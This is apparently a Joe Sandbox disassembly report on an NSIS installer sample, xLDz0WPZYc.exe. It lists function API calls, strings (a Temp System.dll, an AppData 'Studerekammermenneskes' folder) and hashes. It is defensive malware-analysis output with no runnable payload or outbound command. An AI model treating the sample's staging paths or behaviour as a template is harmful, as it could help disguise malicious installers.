Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 6a16e0dd3cc6108475a6e7adf37e54332756fcc3f7317002038e5d5bd84af621
Instruction ID: dd30d9296bace99b119292820e2dbffb2fd0b4cb1c2bef09bc496f5d2c6c7741
Opcode Fuzzy Hash: 6a16e0dd3cc6108475a6e7adf37e54332756fcc3f7317002038e5d5bd84af621
Instruction Fuzzy Hash: A6E0C232A08511ABC710AB349C08A6B77A8EFC8650304893EF501F6151D738AC11ABAE

Function 0040584E Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000003,00402C69,C:\Users\user\Desktop\xLDz0WPZYc.exe,80000000,00000003), ref: 00405852
CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405874

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 8e2162a352c9b3d6bf888d6bdf81e716fa6f6f9a74e85dd2386317c2044df056
Instruction ID: 6507fbbaaec62448b9ae143b35cf90270df4f7fb8743d38c88d9b601ce0c16fe
Opcode Fuzzy Hash: 8e2162a352c9b3d6bf888d6bdf81e716fa6f6f9a74e85dd2386317c2044df056
Instruction Fuzzy Hash: 30D09E71658301AFEF098F20DE16F2E7AA2EB84B01F10562CB642940E0D6715C15DB16

Function 004039A0 Relevance: 61.6, APIs: 32, Strings: 3, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039DC
ShowWindow.USER32(?), ref: 004039F9
DestroyWindow.USER32 ref: 00403A0D
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A29
GetDlgItem.USER32(?,?), ref: 00403A4A
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A5E
IsWindowEnabled.USER32(00000000), ref: 00403A65
GetDlgItem.USER32(?,?), ref: 00403B13
GetDlgItem.USER32(?,00000002), ref: 00403B1D
SetClassLongA.USER32(?,000000F2,?), ref: 00403B37
SendMessageA.USER32(0000040F,00000000,?,?), ref: 00403B88
GetDlgItem.USER32(?,00000003), ref: 00403C2E
ShowWindow.USER32(00000000,?), ref: 00403C4F
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403C61
EnableWindow.USER32(?,?), ref: 00403C7C
GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403C92
EnableMenuItem.USER32(00000000), ref: 00403C99
SendMessageA.USER32(?,?,00000000,?), ref: 00403CB1
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403CC4
lstrlenA.KERNEL32(Slibrighederne Setup: Installing,?,Slibrighederne Setup: Installing,Slibrighederne Setup), ref: 00403CED
SetWindowTextA.USER32(?,Slibrighederne Setup: Installing), ref: 00403CFC
ShowWindow.USER32(?,0000000A), ref: 00403E30

Strings

Slibrighederne Setup: Installing, xrefs: 00403CD9, 00403CE3, 00403CEC, 00403CFA
liy, xrefs: 00403D4A
Slibrighederne Setup, xrefs: 00403CDE

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: Slibrighederne Setup$Slibrighederne Setup: Installing$liy
API String ID: 3282139019-4157386169
Opcode ID: c4d288c9213a4ff13c75ca07aa37345a46e4ee7ce1d3a7d01e6124bc117d097b
Instruction ID: 6a308cc8f2d4566e8290075db2a5fe9cea5b682110ca7f7f0817dc9b094a1d3c
Opcode Fuzzy Hash: c4d288c9213a4ff13c75ca07aa37345a46e4ee7ce1d3a7d01e6124bc117d097b
Instruction Fuzzy Hash: 0EC1D271604204BBDB21AF61ED45E2B3E7DFB44706B40053EF641B12E1C779A942AF6E

Function 0040360E Relevance: 52.7, APIs: 16, Strings: 14, Instructions: 216
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405EE8: GetModuleHandleA.KERNEL32(?,?,?,004030FB,00000009), ref: 00405EFA
Part of subcall function 00405EE8: LoadLibraryA.KERNELBASE(?,?,?,004030FB,00000009), ref: 00405F05
Part of subcall function 00405EE8: GetProcAddress.KERNEL32(00000000,?), ref: 00405F16

GetUserDefaultUILanguage.KERNELBASE(00000002,C:\Users\user\AppData\Local\Temp\,75573410,"C:\Users\user\Desktop\xLDz0WPZYc.exe",00000000), ref: 00403628

Part of subcall function 00405B1B: wsprintfA.USER32 ref: 00405B28

lstrcatA.KERNEL32(1033,Slibrighederne Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Slibrighederne Setup: Installing,00000000,00000002,C:\Users\user\AppData\Local\Temp\,75573410,"C:\Users\user\Desktop\xLDz0WPZYc.exe",00000000), ref: 00403689
lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Studerekammermenneskes,1033,Slibrighederne Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Slibrighederne Setup: Installing,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 004036FE
lstrcmpiA.KERNEL32(?,.exe), ref: 00403711
GetFileAttributesA.KERNEL32(Call), ref: 0040371C
LoadImageA.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Studerekammermenneskes), ref: 00403765
RegisterClassA.USER32(00422E80), ref: 004037A2
SystemParametersInfoA.USER32(?,00000000,?,00000000), ref: 004037BA
CreateWindowExA.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004037EF
ShowWindow.USER32(00000005,00000000), ref: 00403825
LoadLibraryA.KERNELBASE(RichEd20), ref: 00403836
LoadLibraryA.KERNEL32(RichEd32), ref: 00403841
GetClassInfoA.USER32(00000000,RichEdit20A,00422E80), ref: 00403851
GetClassInfoA.USER32(00000000,RichEdit,00422E80), ref: 0040385E
RegisterClassA.USER32(00422E80), ref: 00403867
DialogBoxParamA.USER32(?,00000000,004039A0,00000000), ref: 00403886

Strings

C:\Users\user\AppData\Roaming\Studerekammermenneskes, xrefs: 00403698, 004036A0, 00403738, 0040373E, 0040374E
RichEdit, xrefs: 00403858
Slibrighederne Setup: Installing, xrefs: 0040363A, 00403640, 00403665, 0040366E, 00403683
_Nb, xrefs: 00403781, 004037E9
.exe, xrefs: 0040370B
RichEdit20A, xrefs: 00403849, 0040384F
.DEFAULT\Control Panel\International, xrefs: 00403674
1033, xrefs: 0040362E, 00403684
RichEd32, xrefs: 0040383C
RichEd20, xrefs: 00403831
Control Panel\Desktop\ResourceLocale, xrefs: 00403642
C:\Users\user\AppData\Local\Temp\, xrefs: 0040361A
"C:\Users\user\Desktop\xLDz0WPZYc.exe", xrefs: 00403612
Call, xrefs: 004036CC, 004036D4, 004036E1, 0040372B, 00403731

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\xLDz0WPZYc.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Studerekammermenneskes$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$Slibrighederne Setup: Installing$_Nb
API String ID: 2262724009-1270444294
Opcode ID: 04695480405891d431fb5b182ebd05ffb522bb116bc315d28555dd4449e2f2fa
Instruction ID: a1152651de681702ec182a4452d53c4528d9546a1521c59b1686b62f96f1e611
Opcode Fuzzy Hash: 04695480405891d431fb5b182ebd05ffb522bb116bc315d28555dd4449e2f2fa
Instruction Fuzzy Hash: 966107B16442007FD7206F659D85F2B3AACEB4474AF40457FF840B62E1C7BD6D029A2E

Function 00402C29 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402C3A
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\xLDz0WPZYc.exe,00000400), ref: 00402C56

Part of subcall function 0040584E: GetFileAttributesA.KERNELBASE(00000003,00402C69,C:\Users\user\Desktop\xLDz0WPZYc.exe,80000000,00000003), ref: 00405852
Part of subcall function 0040584E: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405874

GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\xLDz0WPZYc.exe,C:\Users\user\Desktop\xLDz0WPZYc.exe,80000000,00000003), ref: 00402CA2

Strings

C:\Users\user\Desktop, xrefs: 00402C84, 00402C89, 00402C8F
C:\Users\user\Desktop\xLDz0WPZYc.exe, xrefs: 00402C40, 00402C4F, 00402C63, 00402C83
Inst, xrefs: 00402D0E
Null, xrefs: 00402D20
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E01
C:\Users\user\AppData\Local\Temp\, xrefs: 00402C33
Error launching installer, xrefs: 00402C79
"C:\Users\user\Desktop\xLDz0WPZYc.exe", xrefs: 00402C29
soft, xrefs: 00402D17

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\xLDz0WPZYc.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\xLDz0WPZYc.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 4283519449-2831543835
Opcode ID: 83888f2de956a22d0bc41c9bd18695b65df7ebb646604f4f840fd8a04a0cb393
Instruction ID: f25878a385a50b793721b7c2dc62060375717e7a9e735ffe9872fd5df72a7917
Opcode Fuzzy Hash: 83888f2de956a22d0bc41c9bd18695b65df7ebb646604f4f840fd8a04a0cb393
Instruction Fuzzy Hash: 7651F671A00215ABDB20AF65DE89F9E7BB8EB04315F10413BF904B62D1D7BC9E418B9D

Function 0040173F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Studerekammermenneskes,00000000,00000000,00000031), ref: 0040177E
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Studerekammermenneskes,00000000,00000000,00000031), ref: 004017A8

Part of subcall function 00405BBD: lstrcpynA.KERNEL32(?,?,00000400,00403126,Slibrighederne Setup,NSIS Error), ref: 00405BCA

Part of subcall function 00404EA6: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll,00000000,0040E888,00000000,?,?,?,?,?,?,?,?,?,00402F92,00000000,?), ref: 00404EDF
Part of subcall function 00404EA6: lstrlenA.KERNEL32(00402F92,Skipped: C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll,00000000,0040E888,00000000,?,?,?,?,?,?,?,?,?,00402F92,00000000), ref: 00404EEF
Part of subcall function 00404EA6: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll,00402F92,00402F92,Skipped: C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll,00000000,0040E888,00000000), ref: 00404F02
Part of subcall function 00404EA6: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll), ref: 00404F14
Part of subcall function 00404EA6: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F3A
Part of subcall function 00404EA6: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F54
Part of subcall function 00404EA6: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F62

Strings

Call, xrefs: 0040175B, 00401764, 00401771, 00401783, 00401794, 004017CA, 004017E0, 004017FE, 0040183E, 004018BF, 004018C8, 004018D2, 004018DD
C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll, xrefs: 0040180C, 00401828
C:\Users\user\AppData\Local\Temp\nsh73EF.tmp, xrefs: 00401789, 004017F8, 00401816
C:\Users\user\AppData\Roaming\Studerekammermenneskes, xrefs: 0040176C

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsh73EF.tmp$C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll$C:\Users\user\AppData\Roaming\Studerekammermenneskes$Call
API String ID: 1941528284-3156494646
Opcode ID: 0dbdba9127f361ca1c3b0cd58f3bcc8fe4d3a2439afdc42ac3f5675bdd0654d3
Instruction ID: 209590ddbc3a68456c4598a6b25cf33bb68440e8bdc93e33a46783fb3c58ae9b
Opcode Fuzzy Hash: 0dbdba9127f361ca1c3b0cd58f3bcc8fe4d3a2439afdc42ac3f5675bdd0654d3
Instruction Fuzzy Hash: 6F41C472900514BADF10BBA9DC46EAF3679EF01368F20823BF512F10E1D77C5A418AAD

Function 00404EA6 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll,00000000,0040E888,00000000,?,?,?,?,?,?,?,?,?,00402F92,00000000,?), ref: 00404EDF
lstrlenA.KERNEL32(00402F92,Skipped: C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll,00000000,0040E888,00000000,?,?,?,?,?,?,?,?,?,00402F92,00000000), ref: 00404EEF
lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll,00402F92,00402F92,Skipped: C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll,00000000,0040E888,00000000), ref: 00404F02
SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll), ref: 00404F14
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F3A
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F54
SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F62

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll, xrefs: 00404EC6, 00404ED8, 00404EDE, 00404F01, 00404F0D

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll
API String ID: 2531174081-718370586
Opcode ID: 42d41b05157e019d59a8c95eb738bd9c3ef6bfcc5de6f75fe76b0678c24a36e0
Instruction ID: c9e29023339c79119f92ef6614343089cfde3ac0fe0689c8293f17bbb72fca3e
Opcode Fuzzy Hash: 42d41b05157e019d59a8c95eb738bd9c3ef6bfcc5de6f75fe76b0678c24a36e0
Instruction Fuzzy Hash: D0219DB2900118BEDF119FA5CD849DEBFB9EF44354F14807AF944B6291C3789E418BA8

Function 00402E62 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 166
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402EC0
GetTickCount.KERNEL32 ref: 00402F41
MulDiv.KERNEL32(7FFFFFFF,?,00000020), ref: 00402F6E
wsprintfA.USER32 ref: 00402F7E
WriteFile.KERNELBASE(00000000,00000000,0040E888,00000000,00000000), ref: 00402FAA

Strings

... %d%%, xrefs: 00402F78

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: CountTick$FileWritewsprintf
String ID: ... %d%%
API String ID: 4209647438-2449383134
Opcode ID: 5337c28631a73469e3a27c15a5204e9a3d97955436146181da19fe4c8ecc5b92
Instruction ID: 884de2ce8814a110384bf9455658e7085e50030da519773910f3f0b9c7b3960d
Opcode Fuzzy Hash: 5337c28631a73469e3a27c15a5204e9a3d97955436146181da19fe4c8ecc5b92
Instruction Fuzzy Hash: 49519D7190120AABCF10DF65DA08A9F3BB8AB04395F14413BF800B72C0C7789E50DBAA

Function 00401F68 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNELBASE(00000000,?,?), ref: 00401F93

Part of subcall function 00404EA6: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll,00000000,0040E888,00000000,?,?,?,?,?,?,?,?,?,00402F92,00000000,?), ref: 00404EDF
Part of subcall function 00404EA6: lstrlenA.KERNEL32(00402F92,Skipped: C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll,00000000,0040E888,00000000,?,?,?,?,?,?,?,?,?,00402F92,00000000), ref: 00404EEF
Part of subcall function 00404EA6: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll,00402F92,00402F92,Skipped: C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll,00000000,0040E888,00000000), ref: 00404F02
Part of subcall function 00404EA6: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll), ref: 00404F14
Part of subcall function 00404EA6: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F3A
Part of subcall function 00404EA6: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F54
Part of subcall function 00404EA6: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F62

LoadLibraryExA.KERNELBASE(00000000,?,?,?,?), ref: 00401FA3
GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,?,?,?), ref: 0040201D

Strings

`7B, xrefs: 00401FDD

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID: `7B
API String ID: 2987980305-3208876730
Opcode ID: 3c243abdb5c36fad5ee734dbe8eec7e4aa61dc5a7878ef73d437412801a4ab9d
Instruction ID: aaf5afebff6e040c8f3edcccfb20df8df5b0ecb9331c565b7beb057a01dbb2d2
Opcode Fuzzy Hash: 3c243abdb5c36fad5ee734dbe8eec7e4aa61dc5a7878ef73d437412801a4ab9d
Instruction Fuzzy Hash: 9121F672904211B6CF107FA48E8DA6E39B0AB44318F20823BF600B62D0D7BC4941DA5E

Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004056E6: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nst7960.tmp,?,00405752,C:\Users\user\AppData\Local\Temp\nst7960.tmp,C:\Users\user\AppData\Local\Temp\nst7960.tmp,?,?,75573410,0040549D,?,C:\Users\user\AppData\Local\Temp\,75573410,00000000), ref: 004056F4
Part of subcall function 004056E6: CharNextA.USER32(00000000), ref: 004056F9
Part of subcall function 004056E6: CharNextA.USER32(00000000), ref: 0040570D

CreateDirectoryA.KERNELBASE(00000000,?,00000000,?,00000000,?), ref: 004015DB
GetLastError.KERNEL32(?,00000000,?,00000000,?), ref: 004015E5
GetFileAttributesA.KERNELBASE(00000000,?,00000000,?,00000000,?), ref: 004015F3
SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Studerekammermenneskes,00000000,00000000,?), ref: 00401622

Strings

C:\Users\user\AppData\Roaming\Studerekammermenneskes, xrefs: 00401617

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID: C:\Users\user\AppData\Roaming\Studerekammermenneskes
API String ID: 3751793516-3606720462
Opcode ID: f854ab14f6af6053e08f1c4cbb34db86543d3dd89544386ccf80d9808bfa3a12
Instruction ID: d075d57f09c15f05164e6e7227da82a4385631acf0310a11cf010d3362af65ee
Opcode Fuzzy Hash: f854ab14f6af6053e08f1c4cbb34db86543d3dd89544386ccf80d9808bfa3a12
